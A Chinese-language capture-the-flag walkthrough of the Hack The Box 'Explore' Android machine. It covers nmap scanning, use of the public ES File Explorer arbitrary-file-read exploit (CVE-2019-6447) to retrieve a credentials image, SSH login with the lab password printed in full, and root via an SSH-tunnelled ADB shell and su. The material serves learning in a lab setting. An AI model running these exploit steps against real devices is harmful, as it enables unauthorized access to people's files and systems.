免责申明

本文浸透的主机通过非法受权。本文应用的工具和办法仅限学习交换应用，请不要将文中应用的工具和浸透思路用于任何非法用处，对此产生的所有结果，自己不承当任何责任，也不对造成的任何误用或侵害负责。

服务探测

┌──(root💀kali)-[~/htb/Explore]
└─# nmap -p- 10.10.10.247 --open                  
Starting Nmap 7.92 (https://nmap.org) at 2022-01-25 00:43 EST
Nmap scan report for 10.10.10.247
Host is up (0.25s latency).
Not shown: 65530 closed tcp ports (reset), 1 filtered tcp port (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT      STATE SERVICE
2222/tcp  open  EtherNetIP-1
38185/tcp open  unknown
42135/tcp open  unknown
59777/tcp open  unknown

Nmap done: 1 IP address (1 host up) scanned in 89.34 seconds


┌──(root💀kali)-[~/htb/Explore]
└─# nmap -sV -Pn 10.10.10.247 -p 2222,38185,42135,59777                                                         1 ⨯
Starting Nmap 7.92 (https://nmap.org) at 2022-01-25 00:47 EST
Nmap scan report for 10.10.10.247
Host is up (0.24s latency).

PORT      STATE SERVICE VERSION
2222/tcp  open  ssh     (protocol 2.0)
38185/tcp open  unknown
42135/tcp open  http    ES File Explorer Name Response httpd
59777/tcp open  http    Bukkit JSONAPI httpd for Minecraft game server 3.6.0 or older

任意文件读取

搜寻 42135 端口服务破绽，存在一个任意文件读取破绽

┌──(root💀kali)-[~/htb/Explore]
└─# searchsploit ES File Explorer
---------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                    |  Path
---------------------------------------------------------------------------------- ---------------------------------
ES File Explorer 4.1.9.7.4 - Arbitrary File Read                                  | android/remote/50070.py
iOS iFileExplorer Free - Directory Traversal                                      | ios/remote/16278.py
MetaProducts Offline Explorer 1.x - FileSystem Disclosure                         | windows/remote/20488.txt
Microsoft Internet Explorer / MSN - ICC Profiles Crash (PoC)                      | windows/dos/1110.txt
Microsoft Internet Explorer 4.x/5 / Outlook 2000 0/98 0/Express 4.x - ActiveX '.C | windows/remote/19603.txt
Microsoft Internet Explorer 4/5 - DHTML Edit ActiveX Control File Stealing / Cros | windows/remote/19094.txt
Microsoft Internet Explorer 5 - ActiveX Object For Constructing Type Libraries Fo | windows/remote/19468.txt
Microsoft Internet Explorer 5 / Firefox 0.8 / OmniWeb 4.x - URI Protocol Handler  | windows/remote/24116.txt
Microsoft Internet Explorer 5/6 - 'file://' Request Zone Bypass                   | windows/remote/22575.txt
Microsoft Internet Explorer 6 - '%USERPROFILE%' File Execution                    | windows/remote/22734.html
Microsoft Internet Explorer 6 - Local File Access                                 | windows/remote/29619.html
Microsoft Internet Explorer 7 - Arbitrary File Rewrite (MS07-027)                 | windows/remote/3892.html
My File Explorer 1.3.1 iOS - Multiple Web Vulnerabilities                         | ios/webapps/28975.txt
WebFileExplorer 3.6 - 'user' / 'pass' SQL Injection                               | php/webapps/35851.txt
---------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

拷贝到当前目录

┌──(root💀kali)-[~/htb/Explore]
└─# searchsploit -m android/remote/50070.py
  Exploit: ES File Explorer 4.1.9.7.4 - Arbitrary File Read
      URL: https://www.exploit-db.com/exploits/50070
     Path: /usr/share/exploitdb/exploits/android/remote/50070.py
File Type: Python script, ASCII text executable

Copied to: /root/htb/Explore/50070.py

查看 exp 反对命令

┌──(root💀kali)-[~/htb/Explore]
└─# python3 50070.py id 10.10.10.247                                                                            1 ⨯
[-] WRONG COMMAND!
Available commands : 
  listFiles         : List all Files.
  listPics          : List all Pictures.
  listVideos        : List all videos.
  listAudios        : List all audios.
  listApps          : List Applications installed.
  listAppsSystem    : List System apps.
  listAppsPhone     : List Communication related apps.
  listAppsSdcard    : List apps on the SDCard.
  listAppsAll       : List all Application.
  getFile           : Download a file.
  getDeviceInfo     : Get device info.

查看指标零碎中所有照片

┌──(root💀kali)-[~/htb/Explore]
└─# python3 50070.py listPics 10.10.10.247 

==================================================================
|    ES File Explorer Open Port Vulnerability : CVE-2019-6447    |
|                Coded By : Nehal a.k.a PwnerSec                 |
==================================================================

name : concept.jpg
time : 4/21/21 02:38:08 AM
location : /storage/emulated/0/DCIM/concept.jpg
size : 135.33 KB (138,573 Bytes)

name : anc.png
time : 4/21/21 02:37:50 AM
location : /storage/emulated/0/DCIM/anc.png
size : 6.24 KB (6,392 Bytes)

name : creds.jpg
time : 4/21/21 02:38:18 AM
location : /storage/emulated/0/DCIM/creds.jpg
size : 1.14 MB (1,200,401 Bytes)

name : 224_anc.png
time : 4/21/21 02:37:21 AM
location : /storage/emulated/0/DCIM/224_anc.png
size : 124.88 KB (127,876 Bytes)

发现一个叫 creds.jpg 的照片，下载到本地

┌──(root💀kali)-[~/htb/Explore]
└─# python3 50070.py getFile 10.10.10.247 /storage/emulated/0/DCIM/creds.jpg                                     

==================================================================
|    ES File Explorer Open Port Vulnerability : CVE-2019-6447    |
|                Coded By : Nehal a.k.a PwnerSec                 |
==================================================================

[+] Downloading file...
[+] Done. Saved as `out.dat`.

转成 jpg

┌──(root💀kali)-[~/htb/Explore]
└─# mv out.dat creds.jpg 

发现了一个用户凭据：

kristi:Kr1sT!5h@Rp3xPl0r3!

foodhold

登录到零碎，拿到 foothold

┌──(root💀kali)-[~/htb/Explore]
└─# ssh kristi@10.10.10.247 -p 2222                                                                           255 ⨯
Password authentication
(kristi@10.10.10.247) Password: 
:/ $ whoami
u0_a76
:/ $ id
uid=10076(u0_a76) gid=10076(u0_a76) groups=10076(u0_a76),3003(inet),9997(everybody),20076(u0_a76_cache),50076(all_a76) context=u:r:untrusted_app:s0:c76,c256,c512,c768

查看零碎信息，是一台安卓机器

:/ $ uname -a
Linux localhost 4.9.214-android-x86_64-g04f9324 #1 SMP PREEMPT Wed Mar 25 17:11:29 CST 2020 x86_64

在 sdcard 找到 user.txt

:/sdcard $ ls
Alarms  DCIM     Movies Notifications Podcasts  backups   user.txt 
Android Download Music  Pictures      Ringtones dianxinos 
:/sdcard $ cat user.txt
f32017174......
:/sdcard $ pwd
/sdcard

提权

adb

什么是 adb？

ndroid 调试桥 (adb) 是一种性能多样的命令行工具，可让您与设施进行通信。adb 命令可用于执行各种设施操作（例如装置和调试利用），并提供对 Unix shell（可用来在设施上运行各种命令）的拜访权限。它是一种客户端 - 服务器程序，包含以下三个组件：

客户端：用于发送命令。客户端在开发机器上运行。您能够通过收回 adb 命令从命令行终端调用客户端。
守护程序 (adbd)：用于在设施上运行命令。守护程序在每个设施上作为后盾过程运行。
服务器：用于治理客户端与守护程序之间的通信。服务器在开发机器上作为后盾过程运行。

简略来说就是电脑连贯安卓的一个 shell，个别运行在 5555 端口，然而这台靶机并没有对外开放这个端口

用 ssh 做一个转发服务
ssh kristi@10.10.10.247 -L 5555:localhost:5555 -p 2222

kali 端连贯本地 5555 端口

┌──(root💀kali)-[~/htb/Explore]
└─# adb connect localhost:5555
* daemon not running; starting now at tcp:5037
* daemon started successfully
connected to localhost:5555

列出连贯的设施

┌──(root💀kali)-[~/htb/Explore]
└─# adb devices                                                                                                 1 ⨯
List of devices attached
emulator-5554   device
localhost:5555  device

切换成 shell，再用 su 提权到 root

┌──(root💀kali)-[~/htb/Explore]
└─# adb -s localhost shell                                                                                      1 ⨯
x86_64:/ $ id                                                                                                      
uid=2000(shell) gid=2000(shell) groups=2000(shell),1004(input),1007(log),1011(adb),1015(sdcard_rw),1028(sdcard_r),3001(net_bt_admin),3002(net_bt),3003(inet),3006(net_bw_stats),3009(readproc),3011(uhid) context=u:r:shell:s0
x86_64:/ $ whoami
shell
x86_64:/ $ su
:/ # id
uid=0(root) gid=0(root) groups=0(root) context=u:r:su:s0
:/ # whoami
root
:/ # cat /data/root.txt
f04fc82b....